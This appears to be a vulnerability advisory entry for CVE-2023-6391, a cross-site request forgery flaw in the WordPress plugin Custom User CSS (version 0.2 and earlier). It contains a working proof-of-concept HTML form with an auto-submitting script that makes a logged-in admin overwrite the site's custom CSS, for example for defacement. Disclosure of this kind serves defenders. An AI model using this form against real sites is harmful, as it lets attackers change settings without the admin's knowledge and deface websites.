Lucene search
Daniel RufWPEX-ID:4098B18D-6FF3-462C-AF05-48ADB6599CF3HistoryJan 03, 2024 - 12:00 a.m.
Custom User CSS <= 0.2 - Settings Update via CSRF
2024-01-0300:00:00
Daniel Ruf
52
html
csrf
admin
exploit
overwritten css
defacement
security
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
Create an HTML form with the following content and make a logged in admin open it
<form action="https://example.com/wp-admin/themes.php?page=custom-user-css/custom_user_css.php" method="POST">
<input type="text" name="custom_user_css_css" value="overwritten css, for example for defacement">
<input type="text" name="action" value="update">
<input type="text" name="page_options" value="custom_user_css_css">
</form>
<script>
document.forms[0].submit();
</script>Related
cvelist
cvelist
CVE-2023-6391 Custom User CSS <= 0.2 - Settings Update via CSRF
2024-01-29 14:44:27
prion
prion
Cross site request forgery (csrf)
2024-01-29 15:15:00
wpvulndb
wpvulndb
Custom User CSS <= 0.2 - Settings Update via CSRF
2024-01-03 00:00:00
nvd
nvd
CVE-2023-6391
2024-01-29 15:15:09
cve
cve
CVE-2023-6391
2024-01-29 15:15:09
AI Score
6.7
Confidence
Low
EPSS
0.001
Percentile
32.5%
Related for WPEX-ID:4098B18D-6FF3-462C-AF05-48ADB6599CF3